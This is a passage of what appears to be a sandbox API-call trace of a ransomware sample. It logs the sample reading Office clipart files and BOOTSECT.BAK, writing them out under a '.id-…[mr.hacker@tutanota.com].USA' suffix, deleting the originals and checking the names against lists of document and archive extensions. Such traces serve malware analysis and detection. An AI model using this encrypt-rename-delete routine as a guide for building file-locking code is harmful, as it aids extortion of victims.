Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf")) returned 0x20 [0060.046] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0060.046] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.046] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0060.047] GetLastError () returned 0x0 [0060.047] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x94a, lpOverlapped=0x0) returned 1 [0060.048] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x950, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x950, lpOverlapped=0x0) returned 1 [0060.049] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.049] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.049] SetEndOfFile (hFile=0x1f0) returned 1 [0060.049] CloseHandle (hObject=0x1f0) returned 1 [0060.049] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.049] SetEndOfFile (hFile=0x210) returned 1 [0060.050] CloseHandle (hObject=0x210) returned 1 [0060.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00100_.wmf")) returned 1 [0060.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0060.050] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0060.050] lstrlenW (lpString=".doc") returned 4 [0060.050] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.050] lstrlenW (lpString=".docx") returned 5 [0060.050] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.050] lstrlenW (lpString=".pdf") returned 4 [0060.050] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.050] lstrlenW (lpString=".xls") returned 4 [0060.050] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.050] lstrlenW (lpString=".xlsx") returned 5 [0060.051] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.051] lstrlenW (lpString=".ppt") returned 4 [0060.051] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0060.051] lstrlenW (lpString=".zip") returned 4 [0060.051] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.051] lstrlenW (lpString=".rar") returned 4 [0060.051] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.051] lstrlenW (lpString=".bz2") returned 4 [0060.051] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.051] lstrlenW (lpString=".7z") returned 3 [0060.051] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0060.051] lstrlenW (lpString=".dbf") returned 4 [0060.051] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0060.051] lstrlenW (lpString=".1cd") returned 4 [0060.051] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.051] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0060.051] lstrlenW (lpString=".jpg") returned 4 [0060.051] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.051] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1044) returned 1 [0060.051] CloseHandle (hObject=0x210) returned 1 [0060.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf")) returned 0x20 [0060.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0060.052] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.052] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0060.052] GetLastError () returned 0x0 [0060.052] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x414, lpOverlapped=0x0) returned 1 [0060.054] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x420, lpOverlapped=0x0) returned 1 [0060.055] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.055] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.055] SetEndOfFile (hFile=0x1f0) returned 1 [0060.055] CloseHandle (hObject=0x1f0) returned 1 [0060.056] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.056] SetEndOfFile (hFile=0x210) returned 1 [0060.056] CloseHandle (hObject=0x210) returned 1 [0060.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf")) returned 1 [0060.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0060.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0060.057] lstrlenW (lpString=".doc") returned 4 [0060.057] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.057] lstrlenW (lpString=".docx") returned 5 [0060.057] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.057] lstrlenW (lpString=".pdf") returned 4 [0060.057] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.057] lstrlenW (lpString=".xls") returned 4 [0060.057] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.057] lstrlenW (lpString=".xlsx") returned 5 [0060.057] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.057] lstrlenW (lpString=".ppt") returned 4 [0060.057] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0060.057] lstrlenW (lpString=".zip") returned 4 [0060.057] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.057] lstrlenW (lpString=".rar") returned 4 [0060.057] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.057] lstrlenW (lpString=".bz2") returned 4 [0060.057] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.057] lstrlenW (lpString=".7z") returned 3 [0060.057] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0060.057] lstrlenW (lpString=".dbf") returned 4 [0060.057] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0060.057] lstrlenW (lpString=".1cd") returned 4 [0060.057] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0060.058] lstrlenW (lpString=".jpg") returned 4 [0060.058] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.058] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2166) returned 1 [0060.058] CloseHandle (hObject=0x210) returned 1 [0060.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf")) returned 0x20 [0060.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0060.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0060.058] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.058] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0060.059] GetLastError () returned 0x0 [0060.059] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x876, lpOverlapped=0x0) returned 1 [0060.295] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x880, lpOverlapped=0x0) returned 1 [0060.296] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0060.296] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.296] SetEndOfFile (hFile=0x1f0) returned 1 [0060.296] CloseHandle (hObject=0x1f0) returned 1 [0060.296] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0060.296] SetEndOfFile (hFile=0x210) returned 1 [0060.297] CloseHandle (hObject=0x210) returned 1 [0060.297] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0060.297] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf")) returned 1 [0060.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0060.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0060.712] lstrlenW (lpString=".doc") returned 4 [0060.712] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.712] lstrlenW (lpString=".docx") returned 5 [0060.712] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.712] lstrlenW (lpString=".pdf") returned 4 [0060.712] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.712] lstrlenW (lpString=".xls") returned 4 [0060.712] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.712] lstrlenW (lpString=".xlsx") returned 5 [0060.712] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.712] lstrlenW (lpString=".ppt") returned 4 [0060.712] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0060.712] lstrlenW (lpString=".zip") returned 4 [0060.712] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.712] lstrlenW (lpString=".rar") returned 4 [0060.712] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.712] lstrlenW (lpString=".bz2") returned 4 [0060.713] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.713] lstrlenW (lpString=".7z") returned 3 [0060.713] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0060.713] lstrlenW (lpString=".dbf") returned 4 [0060.713] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0060.713] lstrlenW (lpString=".1cd") returned 4 [0060.713] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.713] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0060.713] lstrlenW (lpString=".jpg") returned 4 [0060.713] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 11 os_tid = 0x9a8 [0033.091] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x670690 [0033.091] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x680698 [0033.092] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670100 [0033.092] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x60a3a0 [0033.092] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6700d0 [0033.092] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x32c0020 [0033.092] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670118 [0033.092] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670118, Size=0x20) returned 0x626730 [0033.092] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x670118 [0033.092] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x670118, Size=0x20) returned 0x626708 [0033.092] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0033.092] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0033.092] Wow64DisableWow64FsRedirection (in: OldValue=0x2baff58 | out: OldValue=0x2baff58*=0x0) returned 1 [0033.092] lstrlenW (lpString="kernel32.dll") returned 12 [0033.092] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626730 | out: hHeap=0x5d0000) returned 1 [0033.092] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0033.092] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x626708 | out: hHeap=0x5d0000) returned 1 [0033.092] Sleep (dwMilliseconds=0x64) [0033.954] lstrcmpiW (lpString1=".BAK", lpString2=".USA") returned -1 [0033.954] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0033.955] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.003] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=8192) returned 1 [0034.009] CloseHandle (hObject=0x15c) returned 1 [0034.011] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0034.027] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\bootsect.bak.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.027] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0034.027] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0034.027] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.027] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.027] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\bootsect.bak.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0034.028] GetLastError () returned 0x0 [0034.028] ReadFile (in: hFile=0x15c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x2000, lpOverlapped=0x0) returned 1 [0034.043] WriteFile (in: hFile=0x160, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x2010, lpOverlapped=0x0) returned 1 [0034.044] ReadFile (in: hFile=0x15c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.044] WriteFile (in: hFile=0x160, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.044] SetEndOfFile (hFile=0x160) returned 1 [0034.044] CloseHandle (hObject=0x160) returned 1 [0034.045] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.045] SetEndOfFile (hFile=0x15c) returned 1 [0034.046] CloseHandle (hObject=0x15c) returned 1 [0034.046] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x27) returned 1 [0034.046] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0034.046] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.046] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.046] lstrlenW (lpString=".doc") returned 4 [0034.047] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString=".docx") returned 5 [0034.047] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0034.047] lstrlenW (lpString=".pdf") returned 4 [0034.047] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString=".xls") returned 4 [0034.047] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString=".xlsx") returned 5 [0034.047] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0034.047] lstrlenW (lpString=".ppt") returned 4 [0034.047] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.047] lstrlenW (lpString=".zip") returned 4 [0034.047] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString=".rar") returned 4 [0034.047] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString=".bz2") returned 4 [0034.047] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString=".7z") returned 3 [0034.047] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0034.047] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.047] lstrlenW (lpString=".dbf") returned 4 [0034.047] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.047] lstrlenW (lpString=".1cd") returned 4 [0034.047] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0034.047] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.047] lstrlenW (lpString=".jpg") returned 4 [0034.047] lstrcmpiW (lpString1=".jpg", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.047] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.047] lstrlenW (lpString=".doc") returned 4 [0034.047] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0034.047] lstrlenW (lpString=".docx") returned 5 [0034.047] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0034.047] lstrlenW (lpString=".pdf") returned 4 [0034.048] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0034.048] lstrlenW (lpString=".xls") returned 4 [0034.048] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0034.048] lstrlenW (lpString=".xlsx") returned 5 [0034.048] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0034.048] lstrlenW (lpString=".ppt") returned 4 [0034.048] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0034.048] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.048] lstrlenW (lpString=".zip") returned 4 [0034.048] lstrcmpiW (lpString1=".zip", lpString2=".BAK") returned 1 [0034.048] lstrlenW (lpString=".rar") returned 4 [0034.048] lstrcmpiW (lpString1=".rar", lpString2=".BAK") returned 1 [0034.048] lstrlenW (lpString=".bz2") returned 4 [0034.048] lstrcmpiW (lpString1=".bz2", lpString2=".BAK") returned 1 [0034.048] lstrlenW (lpString=".7z") returned 3 [0034.048] lstrcmpiW (lpString1=".7z", lpString2="BAK") returned -1 [0034.048] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.048] lstrlenW (lpString=".dbf") returned 4 [0034.048] lstrcmpiW (lpString1=".dbf", lpString2=".BAK") returned 1 [0034.048] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.048] lstrlenW (lpString=".1cd") returned 4 [0034.048] lstrcmpiW (lpString1=".1cd", lpString2=".BAK") returned -1 [0034.048] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0034.048] lstrlenW 